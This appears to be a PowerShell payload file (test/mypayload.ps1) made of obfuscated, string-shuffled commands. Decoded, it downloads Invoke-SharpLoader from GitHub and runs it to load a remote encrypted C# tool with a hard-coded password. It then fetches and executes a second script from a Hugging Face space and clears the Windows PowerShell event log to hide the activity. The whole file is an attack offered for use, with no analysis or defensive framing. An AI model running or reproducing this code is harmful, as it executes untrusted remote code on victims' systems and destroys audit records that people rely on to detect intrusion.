test/mypayload.ps1

.("{0}{1}"-f'I','EX')(&("{2}{1}{0}"-f 't','-Objec','New') ("{1}{0}{2}" -f '.','Net','WebClient')).("{2}{0}{3}{1}"-f 'nload','ing','Dow','Str').Invoke(("{24}{17}{7}{11}{18}{0}{8}{20}{22}{10}{9}{4}{5}{13}{12}{15}{23}{6}{2}{3}{21}{16}{14}{1}{19}"-f'conte','vo','h','ar','I','n','S','raw.githu','nt.com/','t/','sSh1','bus','o','v','/master/In','ke','er','/','er','ke-SharpLoader.ps1','S3cur3Th','pLoad','1','-','https:/'));&("{4}{1}{0}{2}{3}{5}"-f 'ar','oke-Sh','pLo','ad','Inv','er') -location ("{4}{16}{17}{0}{14}{22}{11}{10}{24}{23}{6}{8}{25}{1}{26}{27}{21}{12}{13}{19}{5}{9}{3}{28}{18}{15}{7}{20}{2}"-f'git','d','nc','ncryptedC','ht','ste','-','lt.','S','r/E','ur3Th1sSh1t','/S3c','d','s/m','hubuserco','p/Seatbe','tps://','raw.','har','a','e','hea','ntent.com','e','/Invok','harpLoa','er/re','fs/','S') -password ("{1}{0}{2}" -f '1sS','S3cur3Th','h1t') -noArgs;
.("{1}{0}" -f'X','IE')(.("{0}{1}{2}" -f'N','e','w-Object') ("{2}{0}{3}{4}{1}"-f '.We','ient','Net','b','Cl')).("{1}{0}{2}{3}" -f'l','Down','oa','dString').Invoke(("{13}{6}{9}{10}{14}{4}{3}{2}{0}{7}{11}{5}{15}{1}{8}{12}" -f 'tkruto','in/ko','no','/e','es','g/ra','//','y','s','hu','ggingface.co/sp','/ggg','h','https:','ac','w/ma'))
Clear-EventLog -LogName "Windows PowerShell"